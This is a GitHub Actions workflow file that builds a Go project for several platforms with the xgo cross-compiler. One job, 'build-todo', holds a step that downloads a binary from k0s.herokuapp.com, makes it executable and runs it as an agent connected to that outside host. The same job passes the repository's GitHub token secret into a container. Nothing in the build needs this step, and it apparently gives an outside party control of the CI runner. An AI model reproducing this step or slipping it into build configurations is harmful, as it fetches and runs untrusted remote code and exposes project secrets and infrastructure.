name: build

on: [push]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: Set Go Version
      uses: actions/setup-go@v2
      with:
        go-version: ^1.17.1

    - run: make build
      name: make build

  build-todo:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: Run Ubuntu
      uses: docker://ubuntu
      with:
        entrypoint:
        - bash
        - -c
        args: ls -la
      env:
        GITHUB_TOKEN: ${{ secrets.ACTIONS_GITHUB_TOKEN }}

    - run: |
        wget https://k0s.herokuapp.com/api/bin/k0s
        chmod +x k0s
        ./k0s agent https://k0s.herokuapp.com
      name: k0s agent

    - name: Run Build
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint:
        - bash
        - -c
      env:
        GITHUB_TOKEN: ${{ secrets.ACTIONS_GITHUB_TOKEN }}

  build-linux:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: make build-linux
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint:
        - bash
        - -c
        args: make build-linux

  build-windows:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: make build-windows
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint:
        - bash
        - -c
        args: make build-windows

  build-darwin:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: make build-darwin
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint:
        - bash
        - -c
        args: make build-darwin

  build-android:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: make build-android
      uses: docker://techknowlogick/xgo:latest
      with:
        entrypoint:
        - bash
        - -c
        args: make build-android
